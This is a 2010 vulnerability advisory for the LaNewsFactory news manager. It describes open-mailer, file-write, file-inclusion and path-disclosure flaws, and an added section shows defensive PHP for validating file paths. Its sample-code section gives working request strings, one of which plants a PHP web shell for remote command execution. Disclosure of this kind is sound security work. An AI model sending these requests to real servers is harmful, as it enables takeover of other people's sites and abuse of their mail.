LaNewsFactory Multiple Remote Vulnerabilities
http://www.salvatorefresta.net/files/adv/LaNewsFactory%20Multiple%20Remote%20Vulnerabilities-19042010.txt
Name LaNewsFactory
Vendor Christophe Brocas
Versions Affected <= 1.0.0
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-04-19
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
VI. DISCLOSURE TIMELINE
I. ABOUT THE APPLICATION
This is a widely used news manager that does not require a
database.
II. DESCRIPTION
This news management system is affected by many vulnerabilities
that allow a guest to write arbitrary files on the system,
include local files, read local files, etc.
III. ANALYSIS
Summary:
A) Anonymous email
B) Remote File Writing
C) Multiple Local File Inclusion
D) Full Path Disclosure
A) Anonymous email
The mailto.php file allows a guest to send arbitrary emails.
The input is not properly sanitised:
if (ValidEmailAdress($youremail) and ValidEmailAdress($friendemail))
{
    mail ($friendemail, $display[$lang]["mailtoafriend"], "$comments\n\n".$url."print".$LNF_file_extension."?art=$newsfilename\n\n$yourname", "From: $youremail");
}
B) Remote File Writing
The save-edited-news.php file allows a guest to write a
file on the system. This vulnerability may be used to
execute remote commands on the system.
C) Multiple Local File Inclusion
Many files pass unsanitised input to the PHP include
function. This vulnerability may be used to execute remote
commands by including the Apache log file.
D) Full Path Disclosure
For example, the print.php file prints many errors that
include the full path of the file. This path may be very
useful for local file inclusion and other attacks.
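Issues B, C and D all stem from the same untrusted "art" parameter being used as a file path. The following is an added example, not code from the advisory or from LaNewsFactory, showing one way such a parameter can be validated before it reaches include, file writes or error messages. It assumes (for the example only) that articles live in a fixed directory and are plain .xml files.

```php
<?php
// Added example, not LaNewsFactory code: resolve the untrusted "art" value
// to a file inside a fixed news directory, or reject it. Assumptions chosen
// for this example: articles are existing .xml files under $newsDir.

/**
 * Return the real path of the article named by $art inside $newsDir, or
 * null if $art names anything else (other directory, other extension,
 * traversal, null byte, nonexistent file). Allowlist first, then realpath()
 * as a second check that also covers symlinks.
 */
function safe_news_path(string $newsDir, string $art): ?string
{
    // Allowlist: bare file name, no leading "-", fixed .xml extension.
    // Rejects "news/file.php", "../../etc/passwd", "-1.xml" and "x.xml\0".
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9_-]{0,63}\.xml$/', $art)) {
        return null;
    }

    $base = realpath($newsDir);
    if ($base === false) {
        return null; // configured news directory does not exist
    }

    // The file must already exist and resolve under $base; a missing file
    // yields null here instead of a PHP warning that leaks the full path.
    $resolved = realpath($base . DIRECTORY_SEPARATOR . $art);
    if ($resolved === false
        || strpos($resolved, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $resolved;
}

// Usage at an include or save site (hypothetical call, not the app's own):
// $path = safe_news_path(__DIR__ . '/news', $_GET['art'] ?? '');
// if ($path === null) { http_response_code(400); exit('invalid article'); }
```

The path check does not address the missing authorisation on save-edited-news.php or the open mailto.php form; those need an authenticated-editor check and an authenticated or rate-limited sender respectively.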
IV. SAMPLE CODE
A) Anonymous email
mailto.php?friendemail=target@email.com&youremail=ano@email.com&comments=suck!
B) Remote File Writing to Remote Command Execution
save-edited-news.php?art=news/file.php&corps=<?php system($_GET[cmd]); ?>
D) Full Path Disclosure
print.php?art=-1.xml
V. FIX
No fix.
VI. DISCLOSURE TIMELINE
2010-04-19 Bugs discovered
2010-04-19 Advisory released